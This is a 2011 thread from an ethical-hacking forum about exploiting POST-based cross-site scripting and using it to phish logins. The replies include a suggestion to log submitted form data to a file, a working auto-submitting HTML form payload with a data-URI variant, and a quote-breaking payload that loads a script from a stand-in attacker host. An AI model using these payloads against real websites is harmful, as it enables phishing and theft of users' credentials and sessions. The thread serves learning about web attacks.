HomeCalendarCertificationsColumnsFeaturesForumResourcesVitals
 
Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.
Lost Password?
No account yet? Register
Who's Online
We have 33 guests and 1 member online
 
Free Business and Tech Magazines and eBooks

You are here: Home arrow Resourcesarrow Tutorialsarrow XSS post pram and Phishing attack
EH-Net
May 25, 2013, 06:45:08 AM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
   Home   Help Calendar Login Register  
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: XSS post pram and Phishing attack  (Read 6461 times)
0 Members and 1 Guest are viewing this topic.
millwalll
Guest
« on: December 17, 2011, 05:48:24 PM »
Hi alll,

Need some help with my XSS foo. I have seen lots example that exploit XSS using the GET pram but cant find any that would exploit a post pram.

Does anyone have a link to a tutorial or example ?

Second of all I saw somewhere that you can use XSS to steal login details

for example:
Code:
<form name="form1" method="post" action=details.php"?>

IF I had this form on site and found place i could inject XSS I could injection this
form[0].action.vale="http://mypage.com/details.php";

From what I understand this will just redirect the user to mypage.com on the click of the submit buttom.

My question is would I need to have code on the mypage.com/details.php to store the details in a database or what the best way to exploit this ?
Logged
ajohnson
Recruiters
Hero Member
*
Offline Offline

Posts: 1060


aka dynamik


View Profile WWW
« Reply #1 on: December 19, 2011, 10:12:44 AM »
The easiest way to play around with this would be to just create a simple PHP form that has a text field and posts to itself. When submitted, write the contents of the text field to a text file, and then output the contents of the text file back to the page.

For the second one, just have a PHP page that writes everything in the $_REQUEST variable to a log file.
Logged
WIP: GCFA | www.infosiege.net | @infosiege

The day you stop learning is the day you start becoming obsolete.
millwalll
Guest
« Reply #2 on: December 20, 2011, 04:36:01 AM »
thanks will look into them Tongue
Logged
MaXe
Hero Member
*****
Offline Offline

Posts: 669


I've just upgraded myself to a cyborg muahahaa!!1


View Profile WWW
« Reply #3 on: December 26, 2011, 03:37:01 PM »
The way you can exploit POST-based XSS in case the $_POST['var'] variable is used, so you can only submit content via POST-requests is to create a malicious HTTP page, that sends the user to the target site and even submits a malicious script on behalf of the user.

You can use document.form.submit(); or a similar javascript function along with of course, the html <form> which you build on your server.

The link will of course point to a server you control, which could be a short url link, and when the user visits your server, the POST-data will instantly be sent by the user to the target site where the target site will respond to the user.

Meaning, even though the user visits your site first which may feel "malicious" to the user, the user will land at the target site, where the site will say it's own domain name in the URL field, and it could even say https with the blue background behind the favicon, making most users quickly forget they ever came by your server. After all, if your server responds fast, it will take a second or less which most users may not even notice  Smiley

As it's a fun challenge, build a .html document, such as:
<html><body><form method="POST" id="malform" action="https://targetsite.tld/script.php"><input type="hidden" name="target vulnerable variable" value="XSS" /></form><script>document.getElementById('malform').submit();</script>


If you want to test it in the URL Address Field in FireFox, just type this in:
data:text/html,<html><body><form method="POST" id="malform" action="https://targetsite.tld/script.php"><input type="hidden" name="target vulnerable variable" value="XSS" /></form><script>document.getElementById('malform').submit();</script>

Of course you have to edit the following fields: "action", "name" and "value".

Most URL shortening services doesn't permit the "data uri scheme" anymore though, otherwise you could've tricked firefox users into not even visiting your site but actually execute the HTML and javascript code on their own computers which in return, sends a malicious request to the target site which responds with the XSS.

If you need to use " to break a form or whatever, then value="XSS" should of course be e.g., value='XSS' instead, such as: value='"><script src="http://haxx.tld/.j"></script>' and so forth  Grin


Enjoy and merry X-mas  Grin
Logged
I'm an InterN0T'er
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com 		Valid XHTML 1.0! Valid CSS!
Page created in 0.066 seconds with 23 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Advertisement

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.